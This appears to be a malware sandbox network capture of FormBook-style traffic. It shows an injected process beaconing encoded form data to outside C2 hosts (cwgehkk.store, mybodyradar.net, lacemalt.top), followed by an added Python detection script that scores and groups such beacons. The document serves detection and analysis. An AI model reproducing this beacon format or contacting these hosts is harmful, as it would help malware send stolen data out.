                                              Data Raw: 6b 30 36 54 3d 58 34 63 6e 73 31 2b 59 73 37 47 35 32 75 73 77 51 50 6a 76 52 68 4a 34 33 51 31 66 52 47 71 67 66 43 39 4a 73 43 6a 65 43 4f 6e 56 63 36 4b 55 49 6d 4f 76 63 37 38 6d 36 67 42 65 47 63 43 57 4f 54 59 6b 78 39 76 57 42 74 7a 6b 6a 59 43 52 74 58 72 41 58 63 73 34 4b 64 63 49 41 4e 50 62 65 6b 38 5a 51 4f 6b 74 6b 64 50 57 55 53 74 4f 6b 78 6e 44 6a 63 51 79 43 59 4f 5a 43 34 43 4b 65 78 55 66 64 64 49 2b 6a 72 68 4c 48 4f 72 55 68 70 76 6f 4b 76 56 79 51 65 4b 42 74 6c 43 42 35 73 37 6c 50 78 4d 2f 47 43 4b 61 4c 44 46 73 55 61 64 39 41 64 79 42 36 37 41 72 4b 6d 76 45 32 76 37 73 4f 6a 4d 45 51 79 50 6f 76 48 4a 46 4e 4d 5a 47 34 6d 4a 52 46 2b 65 36 37 6e 46 32 47 6e 6a 77 66 4e 43 73 61 68 32 50 62 66 59 75 4e 4c 55 70 34 6b 2b 47 75 61 46 59 71 4b 2b 57 32 57 37 32 62 74 50 38 6b 72 69 70 2b 74 33 56 37 75 61 45 56 56 56 45 74 48 46 4c 78 54 67 2f 6c 56 65 61 53 42 65 6a 79 6d 63 73 52 53 42 49 41 32 6d 30 67 36 6c 34 5a 56 44 6e 4e 74 31 63 52 41 44 65 52 79 4b 6e 34 76 4c 63 5a [TRUNCATED]
                                              Data Ascii: k06T=X4cns1+Ys7G52uswQPjvRhJ43Q1fRGqgfC9JsCjeCOnVc6KUImOvc78m6gBeGcCWOTYkx9vWBtzkjYCRtXrAXcs4KdcIANPbek8ZQOktkdPWUStOkxnDjcQyCYOZC4CKexUfddI+jrhLHOrUhpvoKvVyQeKBtlCB5s7lPxM/GCKaLDFsUad9AdyB67ArKmvE2v7sOjMEQyPovHJFNMZG4mJRF+e67nF2GnjwfNCsah2PbfYuNLUp4k+GuaFYqK+W2W72btP8krip+t3V7uaEVVVEtHFLxTg/lVeaSBejymcsRSBIA2m0g6l4ZVDnNt1cRADeRyKn4vLcZb+C/ycaFNntM+IbAB7jyh7UiBqlvX+g01d4MEboE8j42B4b0ezpVsU0IlnLHWhaO1bXS5piV8jOnmhmHUWSJ2EizhJcOaKr5De9+cfEXdSF0hiAEAxaIMuV40p3Zow1jgdCMmObQxvR8ea1+q5JEWUqiw9AqxeEm+umyN3ai4BYd0duRiTz/VewCYYvqXR6vcMqUvDhyyjz+BnknlzTidBSa6mFcab45zQQdyv/Rf7f5RcljH9MqgjUV/VrclrCkTFCwZ+plwMNePRSQfVmVMyuWWlwzMAcGHfEbPMOx9HXXTP+i3Kv4t22MahR3WPldiTdiR6Am1UoDBpZGpiQEYyhlv6X0epcAIWj5Bw4CCjXrSMBmMCJdpLtjV/gULDft7oxosfYDA6HV6x+o+nHtLchobJFTKQ/hxHrDLAn4IJ5yGmOW+dV4uhD/o4JXEd335m6B082hR/05w8foaW89HY9tKHl0JSv0PIp2oZONBlZgTmWv2o2I7Aom+SEUyaMPUJ6y/Xqo2mwhs0NU7+kiqCv2SqGylA/sY6o2P6TGI2FdVpNOtZQ0h4ZtrwoUU64Zpu4EtpuneJthNk8VT+acnMp6rkvDjgzPP/XHb+/GogUP4Ix8NglXOnFZOSFc2dIj+40iKefd//Gn3pxcUSqNDmsUYcXkbnizOY [TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              8 | 192.168.2.5 | 49721 | 43.155.26.241 | 80 | 5784 | C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:40:17.198282957 CEST | 545 | OUT | GET /kwl6/?k06T=a60HvCvUhLiFhuUSc8WrKARCzXFsQAvffUZBz2uIU9nHYJX4NGLIPasF9EYqD4O1NmBy69LXG4mImYvzxGn1S/csb+glCs2OenUaXJQynPXKXRJsgC/umNodRP7idNP7JA==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.cwgehkk.store
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              9 | 192.168.2.5 | 49722 | 3.33.130.190 | 80 | 5784 | C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:40:43.629817009 CEST | 805 | OUT | POST /nml2/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.mybodyradar.net
                                              Origin: http://www.mybodyradar.net
                                              Referer: http://www.mybodyradar.net/nml2/
                                              Content-Length: 205
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 4b 4e 41 6b 76 50 71 4a 6d 33 51 70 7a 79 6d 65 43 30 42 58 51 52 53 4d 31 34 56 39 6c 32 54 37 77 6c 64 51 2b 38 62 6c 62 6a 54 4f 78 72 62 70 71 45 66 57 69 67 58 6c 75 50 68 71 76 30 46 6a 34 6b 39 65 70 46 36 33 51 76 73 4a 50 74 58 72 6c 4c 47 6a 6c 41 41 5a 49 50 64 32 5a 50 69 74 37 42 6c 67 2f 79 59 34 75 47 63 73 45 41 70 4e 73 37 6a 4f 74 76 69 69 2b 66 65 61 53 66 6f 63 33 70 59 45 4a 76 62 71 76 32 41 75 61 2f 45 77 33 4b 31 55 33 46 74 67 48 76 45 4c 41 50 71 70 52 55 78 79 55 34 54 4f 62 42 4c 65 71 37 75 33 59 44 6b 6d 4d 70 78 63 75 33 77 2b 2f 6e 71 51 41 65 5a 31 65 61 30 3d
                                              Data Ascii: k06T=KNAkvPqJm3QpzymeC0BXQRSM14V9l2T7wldQ+8blbjTOxrbpqEfWigXluPhqv0Fj4k9epF63QvsJPtXrlLGjlAAZIPd2ZPit7Blg/yY4uGcsEApNs7jOtvii+feaSfoc3pYEJvbqv2Aua/Ew3K1U3FtgHvELAPqpRUxyU4TObBLeq7u3YDkmMpxcu3w+/nqQAeZ1ea0=


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              10 | 192.168.2.5 | 49723 | 3.33.130.190 | 80 | 5784 | C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:40:46.168713093 CEST | 825 | OUT | POST /nml2/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.mybodyradar.net
                                              Origin: http://www.mybodyradar.net
                                              Referer: http://www.mybodyradar.net/nml2/
                                              Content-Length: 225
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 4b 4e 41 6b 76 50 71 4a 6d 33 51 70 38 7a 57 65 45 58 70 58 46 42 53 50 35 59 56 39 76 57 54 2f 77 6c 52 51 2b 39 76 54 62 56 6a 4f 78 4c 72 70 37 31 66 57 6a 67 58 6c 36 2f 68 6a 68 55 46 73 34 6b 77 6a 70 42 36 33 51 76 34 4a 50 74 48 72 6d 38 53 6b 33 67 41 66 44 76 64 77 58 76 69 74 37 42 6c 67 2f 79 63 47 75 47 55 73 45 77 5a 4e 74 65 50 4e 6a 50 69 74 35 66 65 61 57 66 6f 59 33 70 5a 52 4a 72 62 4d 76 31 34 75 61 2b 30 77 33 62 31 58 39 46 74 69 61 2f 46 5a 4f 2f 4c 5a 4a 6e 68 61 65 4b 43 4f 43 52 58 54 69 74 44 64 43 68 73 4f 66 4a 64 6b 2b 6b 34 4a 75 58 4c 35 61 39 4a 46 41 4e 6a 69 44 79 51 36 78 73 66 76 74 6f 33 4b 45 35 79 48 56 30 78 32
                                              Data Ascii: k06T=KNAkvPqJm3Qp8zWeEXpXFBSP5YV9vWT/wlRQ+9vTbVjOxLrp71fWjgXl6/hjhUFs4kwjpB63Qv4JPtHrm8Sk3gAfDvdwXvit7Blg/ycGuGUsEwZNtePNjPit5feaWfoY3pZRJrbMv14ua+0w3b1X9Ftia/FZO/LZJnhaeKCOCRXTitDdChsOfJdk+k4JuXL5a9JFANjiDyQ6xsfvto3KE5yHV0x2


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              11 | 192.168.2.5 | 49724 | 3.33.130.190 | 80 | 5784 | C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:40:48.709886074 CEST | 1842 | OUT | POST /nml2/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.mybodyradar.net
                                              Origin: http://www.mybodyradar.net
                                              Referer: http://www.mybodyradar.net/nml2/
                                              Content-Length: 1241
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 4b 4e 41 6b 76 50 71 4a 6d 33 51 70 38 7a 57 65 45 58 70 58 46 42 53 50 35 59 56 39 76 57 54 2f 77 6c 52 51 2b 39 76 54 62 56 72 4f 78 59 6a 70 70 6d 48 57 35 67 58 6c 35 2f 68 75 68 55 46 78 34 6b 34 6e 70 42 2b 4e 51 73 41 4a 4f 4c 4c 72 78 2b 71 6b 75 51 41 66 4d 50 64 78 5a 50 69 43 37 42 56 73 2f 78 30 47 75 47 55 73 45 79 42 4e 6f 37 6a 4e 75 76 69 69 2b 66 65 57 53 66 6f 77 33 70 51 71 4a 72 66 36 76 45 59 75 61 65 6b 77 78 70 4e 58 78 46 74 73 4a 50 45 63 4f 2f 48 47 4a 6e 39 77 65 4c 32 30 43 54 58 54 79 36 2b 4c 51 78 67 45 49 36 52 75 77 57 41 71 32 6e 4c 55 5a 74 34 7a 42 66 79 59 49 6a 77 4f 2b 73 62 57 6a 35 69 6d 54 4e 36 45 51 43 51 48 64 59 37 71 48 31 69 44 33 68 51 70 6f 46 41 4f 6d 4a 56 49 4b 4e 37 56 41 50 4f 4c 56 79 48 4a 4d 5a 45 54 4e 49 43 39 64 69 68 58 4c 39 44 68 4c 59 30 5a 55 38 51 36 6d 6e 56 72 56 6d 4d 37 31 5a 33 6a 6b 52 6c 7a 4f 4d 76 66 79 74 56 62 61 34 35 65 75 65 70 41 30 57 33 6f 67 42 79 67 2f 59 63 53 6a 4f 51 50 54 50 38 54 6b 56 61 55 76 [TRUNCATED]
                                              Data Ascii: k06T=[TRUNCATED]


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              12 | 192.168.2.5 | 49725 | 3.33.130.190 | 80 | 5784 | C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:40:51.248119116 CEST | 547 | OUT | GET /nml2/?k06T=HPoEs5HSsEYYnAW6PVozIACR+89TlHzFxT1N2ofTBBi/nJmbqmnSjRqVxPoNn0pwlxgNo3SmadBTH7enssKrgG8HFM9ue4Cv/jlK8Hwkml5mQyRFpKLBj5uVntz3S/FMqw==&rz=LZsl-bkp-XfXeRLp HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.mybodyradar.net
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Jul 3, 2024 16:40:51.772938013 CEST | 412 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Wed, 03 Jul 2024 14:40:51 GMT
                                              Content-Type: text/html
                                              Content-Length: 272
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6b 30 36 54 3d 48 50 6f 45 73 35 48 53 73 45 59 59 6e 41 57 36 50 56 6f 7a 49 41 43 52 2b 38 39 54 6c 48 7a 46 78 54 31 4e 32 6f 66 54 42 42 69 2f 6e 4a 6d 62 71 6d 6e 53 6a 52 71 56 78 50 6f 4e 6e 30 70 77 6c 78 67 4e 6f 33 53 6d 61 64 42 54 48 37 65 6e 73 73 4b 72 67 47 38 48 46 4d 39 75 65 34 43 76 2f 6a 6c 4b 38 48 77 6b 6d 6c 35 6d 51 79 52 46 70 4b 4c 42 6a 35 75 56 6e 74 7a 33 53 2f 46 4d 71 77 3d 3d 26 72 7a 3d 4c 5a 73 6c 2d 62 6b 70 2d 58 66 58 65 52 4c 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?k06T=HPoEs5HSsEYYnAW6PVozIACR+89TlHzFxT1N2ofTBBi/nJmbqmnSjRqVxPoNn0pwlxgNo3SmadBTH7enssKrgG8HFM9ue4Cv/jlK8Hwkml5mQyRFpKLBj5uVntz3S/FMqw==&rz=LZsl-bkp-XfXeRLp"}</script></head></html>
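The sessions above all come from the same injected process (PID 5784) and share one shape: a hard-coded iPad Safari user-agent, a four-character directory (/ktbm/, /kwl6/, /nml2/, /tb8p/), a POST whose Origin and Referer are forged to the target's own path and whose body is a single opaque form field (k06T=...), then a GET that carries the same field plus an rz= token. The field name stays k06T while the hosts rotate, and none of the hosts shown here answers with anything other than a 301 to HTTPS, a JavaScript bounce to /lander, or a 404. The following Python is an added example, not Joe Sandbox or FormBook code: it parses raw HTTP requests, scores each one against those traits, and groups hits by the reused field name so the host rotation is visible in one place. The sample requests are constructed from headers and values quoted in this report; the trait list and the scoring threshold are assumptions drawn from this capture only.

```python
"""FormBook-style HTTP beacon heuristics over raw request text.

Added example; not Joe Sandbox's or FormBook's code. The traits scored below
are taken only from the sessions in this report (static iPad user-agent,
four-character directory, POST with one opaque form field and forged
Origin/Referer, GET check-in with the same field plus rz=, one field name
reused across several hosts). Sample requests are constructed from values
quoted in the report.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

IPAD_UA = ("Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 "
           "(KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53")
PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")        # observed: /ktbm/, /kwl6/, /nml2/, /tb8p/
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]+=*$")   # form/query values are base64-alphabet blobs


def split_kv(s):
    """Split 'a=b&c=d' without unquoting, so '+' and '/' inside the blobs survive."""
    out = {}
    for pair in s.split("&"):
        if pair:
            k, _, v = pair.partition("=")
            out[k] = v
    return out


def parse_request(raw):
    """Parse one raw HTTP/1.1 request (CRLF headers, optional body) into a dict."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(":")
        if k:
            headers[k.strip().lower()] = v.strip()
    parts = urlsplit(target)
    return {"method": method, "host": headers.get("host", ""), "path": parts.path,
            "query": split_kv(parts.query), "form": split_kv(body.strip()), "headers": headers}


def score_request(req):
    """Return (score, reasons); each reason is one trait seen in the capture."""
    reasons = []
    h, host, path = req["headers"], req["host"], req["path"]
    if h.get("user-agent", "") == IPAD_UA:
        reasons.append("hard-coded iPad user-agent")
    if PATH_RE.match(path):
        reasons.append("four-character directory path")
    if req["method"] == "POST":
        if h.get("origin") == f"http://{host}" and h.get("referer") == f"http://{host}{path}":
            reasons.append("origin/referer forged to the same path")
        if len(req["form"]) == 1:
            value = next(iter(req["form"].values()))
            if len(value) >= 100 and BASE64ISH.match(value):
                reasons.append("single opaque base64-like form field")
    elif req["method"] == "GET" and "rz" in req["query"] and set(req["query"]) - {"rz"}:
        reasons.append("GET check-in carrying rz= token")
    return len(reasons), reasons


def beacon_key(req):
    """Field name reused between POST body and GET query (k06T in this report)."""
    keys = [k for k in list(req["form"]) + list(req["query"]) if k != "rz"]
    return keys[0] if len(keys) == 1 else None


def detect(raw_requests, threshold=3):
    """Score each request; group hits by beacon key to expose the decoy-host rotation."""
    hits, hosts_by_key = [], defaultdict(set)
    for raw in raw_requests:
        req = parse_request(raw)
        score, reasons = score_request(req)
        key = beacon_key(req)
        if key and score >= threshold:
            hosts_by_key[key].add(req["host"])
            hits.append({"method": req["method"], "host": req["host"], "key": key,
                         "score": score, "reasons": reasons})
    campaigns = {k: sorted(v) for k, v in hosts_by_key.items() if len(v) >= 2}
    return {"hits": hits, "campaigns": campaigns}


def build_request(method, host, path, body="", ua=IPAD_UA):
    """Construct a request in the shape shown in the capture (sample data only)."""
    hdrs = [f"{method} {path} HTTP/1.1", f"Host: {host}", f"User-Agent: {ua}", "Connection: close"]
    if method == "POST":
        hdrs += [f"Origin: http://{host}", f"Referer: http://{host}{path.split('?')[0]}",
                 "Content-Type: application/x-www-form-urlencoded", f"Content-Length: {len(body)}"]
    return "\r\n".join(hdrs) + "\r\n\r\n" + body


# Constructed sample traffic: two beacon POSTs, one GET check-in, one benign request.
SAMPLE = [
    build_request("POST", "www.cwgehkk.store", "/kwl6/",
                  "k06T=X4cns1+Ys7G53O8wVujvGRJ74w1fYmrpfCxJsGSFB8LVfraUJEWvPr8m8gBaCcDVOTdbx8fsBrTki/"
                  "OR9hHDcMsmdNcLANOBeksdQOQXkdXWUAVOzxnE/MQyCYOrC4CyexMXddguj6RLHrfUmLHrafV+e+KfhU+"
                  "RzemsDBZ9ZUOGMxVvUaZDEcSOkLQiZRfJne77PnI="),
    build_request("GET", "www.mybodyradar.net",
                  "/nml2/?k06T=HPoEs5HSsEYYnAW6PVozIACR+89TlHzFxT1N2ofTBBi/nJmbqmnSjRqVxPoNn0pwlxgNo3"
                  "SmadBTH7enssKrgG8HFM9ue4Cv/jlK8Hwkml5mQyRFpKLBj5uVntz3S/FMqw==&rz=LZsl-bkp-XfXeRLp"),
    build_request("POST", "www.lacemalt.top", "/tb8p/",
                  "k06T=nMi0BGwqXNIAZkrTGM9zaJfVGKlg7ApE8e93q6gYYU/PPChcE/UhqISVm7cV/2dUxUBZdrlvG0r9"
                  "gyVWcDqp0IS3b0aTHe9Zhr3oRcQ24eVL9T3loWqz6bsxuFGZ79CCNFixdupd8PrEA0QXDkDoqkemBZDa"
                  "leKN0mFkAhTwn36RAItNPdnVhXIO5hqnezR+RF8sLuU="),
    build_request("GET", "example.com", "/index.html", ua="Mozilla/5.0 (Windows NT 10.0) Chrome/126.0"),
]

if __name__ == "__main__":
    result = detect(SAMPLE)
    for hit in result["hits"]:
        print(hit["method"], hit["host"], hit["score"], hit["reasons"])
    print("campaigns:", result["campaigns"])
```

Run it over reassembled requests from a PCAP or proxy log rather than over single lines: the iPad user-agent alone is weak evidence, and a single POST with an opaque field can be legitimate, but the same opaque field name recurring across unrelated hosts from one process is the signal worth alerting on, which is why the campaign grouping, not the per-request score, is the output to act on.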


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              13 | 192.168.2.5 | 49726 | 203.161.55.102 | 80 | 5784 | C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:40:57.146461010 CEST | 796 | OUT | POST /tb8p/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.lacemalt.top
                                              Origin: http://www.lacemalt.top
                                              Referer: http://www.lacemalt.top/tb8p/
                                              Content-Length: 205
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 6e 4d 69 30 42 47 77 71 58 4e 49 41 5a 6b 72 54 47 4d 39 7a 61 4a 66 56 47 4b 6c 67 37 41 70 45 38 65 39 33 71 36 67 59 59 55 2f 50 50 43 68 63 45 2f 55 68 71 49 53 56 6d 37 63 56 2f 32 64 55 78 55 42 5a 64 72 6c 76 47 30 72 39 67 79 56 57 63 44 71 70 30 49 53 33 62 30 61 54 48 65 39 5a 68 72 33 6f 52 63 51 32 34 65 56 4c 39 54 33 6c 6f 57 71 7a 36 62 73 78 75 46 47 5a 37 39 43 43 4e 46 69 78 64 75 70 64 38 50 72 45 41 30 51 58 44 6b 44 6f 71 6b 65 6d 42 5a 44 61 6c 65 4b 4e 30 6d 46 6b 41 68 54 77 6e 33 36 52 41 49 74 4e 50 64 6e 56 68 58 49 4f 35 68 71 6e 65 7a 52 2b 52 46 38 73 4c 75 55 3d
                                              Data Ascii: k06T=nMi0BGwqXNIAZkrTGM9zaJfVGKlg7ApE8e93q6gYYU/PPChcE/UhqISVm7cV/2dUxUBZdrlvG0r9gyVWcDqp0IS3b0aTHe9Zhr3oRcQ24eVL9T3loWqz6bsxuFGZ79CCNFixdupd8PrEA0QXDkDoqkemBZDaleKN0mFkAhTwn36RAItNPdnVhXIO5hqnezR+RF8sLuU=
                                              Jul 3, 2024 16:40:57.752840996 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 03 Jul 2024 14:40:57 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID: 14 | Source IP: 192.168.2.5 | Source Port: 49727 | Destination IP: 203.161.55.102 | Destination Port: 80 | PID: 5784 | Process: C:\Program Files (x86)\IOfMKDBObDNcoFXmnQFfpHnZMkYQTQoWbtTYIbmdlDZwBcxOaxyRzLAJiwAkei\pMYZJWoDTJXnmaTJMCEeAnzIbNV.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 3, 2024 16:40:59.690541983 CEST | 816 | OUT | POST /tb8p/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate, br
                                              Host: www.lacemalt.top
                                              Origin: http://www.lacemalt.top
                                              Referer: http://www.lacemalt.top/tb8p/
                                              Content-Length: 225
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                              Data Raw: 6b 30 36 54 3d 6e 4d 69 30 42 47 77 71 58 4e 49 41 62 45 62 54 4c 4f 56 7a 50 35 66 61 4c 61 6c 67 30 67 6f 4e 38 65 78 33 71 37 6c 54 59 47 72 50 4f 6a 52 63 56 4f 55 68 74 49 53 56 2b 72 63 55 79 57 64 66 78 55 4d 6d 64 70 42 76 47 33 58 39 67 7a 6c 57 66 30 32 71 30 59 53 35 51 55 62 56 4a 2b 39 5a 68 72 33 6f 52 63 30 63 34 65 4e 4c 2b 6a 48 6c 6e 58 71 73 6c 72 73 32 2b 6c 47 5a 2f 39 43 47 4e 46 69 58 64 71 68 6e 38 4b 76 45 41 32 49 58 44 52 76 76 7a 55 65 67 46 5a 43 58 69 76 6e 67 38 31 59 6c 66 43 36 52 6e 52 75 72 42 2b 41 6e 56 2f 76 39 79 33 6b 32 70 79 69 51 50 44 77 58 4c 6d 73 63 56 35 43 2f 58 50 44 51 30 77 4c 31 31 2b 56 79 6d 56 74 4a 63 34 49 79
                                              Data Ascii: k06T=nMi0BGwqXNIAbEbTLOVzP5faLalg0goN8ex3q7lTYGrPOjRcVOUhtISV+rcUyWdfxUMmdpBvG3X9gzlWf02q0YS5QUbVJ+9Zhr3oRc0c4eNL+jHlnXqslrs2+lGZ/9CGNFiXdqhn8KvEA2IXDRvvzUegFZCXivng81YlfC6RnRurB+AnV/v9y3k2pyiQPDwXLmscV5C/XPDQ0wL11+VymVtJc4Iy
                                              Jul 3, 2024 16:41:00.285546064 CEST | 533 | IN | HTTP/1.1 404 Not Found
                                              Date: Wed, 03 Jul 2024 14:41:00 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html
